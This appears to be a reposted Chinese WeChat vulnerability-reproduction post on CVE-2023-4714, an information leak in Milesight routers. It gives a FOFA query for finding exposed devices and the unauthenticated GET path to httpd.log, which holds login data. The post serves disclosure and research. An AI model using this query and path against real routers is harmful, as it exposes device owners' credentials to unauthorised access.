漏洞复现 || Milesight Router httpd.log 信息泄漏(CVE-2023-4714)

2023年12月21日09:59:58评论34 views字数 385阅读1分17秒阅读模式

免责声明

我爱林攻防研究院的技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

漏洞描述

Milesight Router 存在信息泄漏漏洞，攻击者通过访问httpd.log可以获取登陆敏感日志信息。

漏洞复现 || Milesight Router httpd.log 信息泄漏(CVE-2023-4714)

资产确定

fofa："rt_title"

漏洞复现

1.利用如下POC进行GET访问得到回显

/lang/log/httpd.log

漏洞复现 || Milesight Router httpd.log 信息泄漏(CVE-2023-4714)

如有侵权，请联系删除

感谢您抽出

漏洞复现 || Milesight Router httpd.log 信息泄漏(CVE-2023-4714)

来阅读本文

漏洞复现 || Milesight Router httpd.log 信息泄漏(CVE-2023-4714)

点它，分享点赞在看都在这里

原文始发于微信公众号（我爱林）：漏洞复现 || Milesight Router httpd.log 信息泄漏(CVE-2023-4714)

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞复现 || Milesight Router httpd.log 信息泄漏(CVE-2023-4714)

免责声明

漏洞描述

资产确定

漏洞复现

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

发表评论

在线咨询

微信